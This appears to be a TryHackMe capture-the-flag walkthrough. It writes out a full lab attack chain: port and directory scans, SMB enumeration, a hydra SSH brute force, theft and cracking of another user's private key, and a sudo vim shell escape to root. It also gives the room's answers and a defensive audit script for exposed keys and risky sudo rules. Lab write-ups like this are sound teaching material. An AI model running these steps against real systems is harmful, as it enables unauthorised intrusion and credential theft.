THM: Basic Pentesting Walkthrough
TryHackMe's Basic Pentesting room is an excellent starting point for anyone new to penetration testing. This walkthrough covers the methodology and thinking process.
Room Information
- Name: Basic Pentesting
- Platform: TryHackMe
- Difficulty: Easy
- Skills: Enumeration, SMB, SSH, Linux PrivEsc
Task 1: Enumeration
Deploy the Machine
Start the machine and note the IP address.
Nmap Scan
nmap -sC -sV -oN nmap/initial 10.10.X.X
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 4.3.11
8009/tcp open ajp13 Apache Jserv
8080/tcp open http Apache Tomcat 9.0.7
Task 2: Web Enumeration
Apache (Port 80)
Visiting port 80 shows a default page. Let's run directory enumeration:
gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt
Found: /development/ directory
Exploring /development
Contains two text files:
- dev.txt - Mentions that "J" and "K" are working on the project
- j.txt - Notes that "K" set up the password for the share
This gives us potential usernames: j and k
Apache Tomcat (Port 8080)
Default Tomcat page. Attempting default credentials on /manager fails.
Task 3: SMB Enumeration
Listing Shares
smbclient -L //10.10.X.X -N
Shares found:
Anonymous READ
IPC$ NO ACCESS
Accessing Anonymous Share
smbclient //10.10.X.X/Anonymous -N
Downloading files:
get staff.txt
Contents reveal potential username patterns.
Enum4linux
enum4linux -a 10.10.X.X
Confirms users: jan and kay
Task 4: Brute Forcing SSH
With usernames identified, let's try SSH brute force:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X -t 4
Found: jan:armando
SSH Access
ssh jan@10.10.X.X
We're in as jan.
Task 5: User Enumeration
Exploring the System
ls -la /home/
Two users: jan and kay
cat /etc/passwd | grep bash
Finding Kay's SSH Key
ls -la /home/kay/
The .ssh directory is readable!
cat /home/kay/.ssh/authorized_keys
cat /home/kay/.ssh/id_rsa
Copy the private key to your machine.
Task 6: Cracking SSH Key
Using ssh2john
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
Cracking with John
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Found: beeswax
SSH as Kay
chmod 600 id_rsa
ssh -i id_rsa kay@10.10.X.X
Key passphrase: beeswax
Task 7: Privilege Escalation
Enumeration
sudo -l
Kay can run /bin/vim as root without a password!
GTFOBins
Check GTFOBins for vim privilege escalation:
sudo vim -c ':!/bin/bash'
Root!
whoami
# root
Read the final flag:
cat /root/pass.bak
Questions & Answers
- What is the name of the hidden directory on the web server? development
- What is the name of the user that was identified with SSH brute force? jan
- What is Jan's password? armando
- What service can be used to escalate to root? vim
- What is the root's password? [Found in pass.bak]
Methodology Summary
- Reconnaissance - Identify open ports and services
- Enumeration - Gather detailed information from each service
- Exploitation - Use gathered information to gain access
- Privilege Escalation - Elevate from user to root
- Documentation - Record findings and methods
Key Takeaways
For Beginners
- Always enumerate thoroughly before exploiting
- Check file permissions carefully
- GTFOBins is your friend for privilege escalation
- Take notes as you go
Security Lessons
- Never reuse passwords across services
- Protect SSH private keys
- Restrict sudo privileges carefully
- Don't expose sensitive directories
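To turn the last three lessons into something you can check on a host, here is an added defender-side example (not part of the room or this walkthrough): a POSIX shell audit that flags the two misconfigurations the room relies on, a private key readable from another user's world-traversable home, and a NOPASSWD sudo rule on a binary with a known shell escape. It builds a constructed throwaway directory tree and a constructed sudoers fragment; the paths, user names and the binary list are assumptions, not the room's files.

```shell
#!/bin/sh
# Constructed demo tree: two home directories and a sudoers fragment.
# On a real host you would point audit_ssh_keys at /home and
# audit_sudoers at /etc/sudoers and /etc/sudoers.d/* instead.
set -u

setup_demo() {
    root=$(mktemp -d)
    for u in jan kay; do mkdir -p "$root/home/$u/.ssh"; done
    echo "CONSTRUCTED-NOT-A-REAL-KEY" > "$root/home/kay/.ssh/id_rsa"
    echo "CONSTRUCTED-NOT-A-REAL-KEY" > "$root/home/jan/.ssh/id_rsa"
    chmod 755 "$root/home/kay"; chmod 644 "$root/home/kay/.ssh/id_rsa"  # weak
    chmod 700 "$root/home/jan"; chmod 600 "$root/home/jan/.ssh/id_rsa"  # hardened
    cat > "$root/sudoers" <<'EOF'
# constructed sudoers fragment for the demo
kay ALL=(ALL) NOPASSWD: /usr/bin/vim
jan ALL=(ALL) /usr/bin/systemctl restart apache2
EOF
    echo "$root"
}

# Print one EXPOSED_KEY line per private key that is group/other readable
# or sits in a home directory other users can traverse (other+x).
audit_ssh_keys() {
    base="$1"
    for key in "$base"/*/.ssh/id_*; do
        [ -f "$key" ] || continue
        case "$key" in *.pub) continue ;; esac
        mode=$(stat -c '%A' "$key")                                  # e.g. -rw-r--r--
        homemode=$(stat -c '%A' "$(dirname "$(dirname "$key")")")    # e.g. drwxr-xr-x
        case "$mode" in
            ????r*|???????r*) echo "EXPOSED_KEY $key key=$mode home=$homemode"; continue ;;
        esac
        case "$homemode" in
            ?????????[xt]*) echo "EXPOSED_KEY $key key=$mode home=$homemode" ;;
        esac
    done
}

# Print one RISKY_SUDO line per passwordless rule that grants ALL or a
# binary with a documented shell escape (the room abuses vim); extend the
# list from GTFOBins for your own baseline.
audit_sudoers() {
    risky='vim|vi|nano|less|more|find|awk|perl|python'
    grep -v '^[[:space:]]*#' "$1" | grep NOPASSWD \
        | grep -E "NOPASSWD:[[:space:]]*ALL|/(${risky})[0-9.]*([[:space:]]|$)" \
        | sed 's/^/RISKY_SUDO /'
}

demo=$(setup_demo)
audit_ssh_keys "$demo/home"
audit_sudoers "$demo/sudoers"
rm -rf "$demo"
```

The kay key is reported twice over (readable mode and traversable home), the jan key not at all, and only the vim rule is flagged; the systemctl rule still requires a password and targets a binary without a shell escape, so it passes.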
Tools Used
- nmap
- gobuster
- smbclient
- enum4linux
- hydra
- john
- ssh
New to penetration testing? Check out our beginner resources at m1k3@msquarellc.net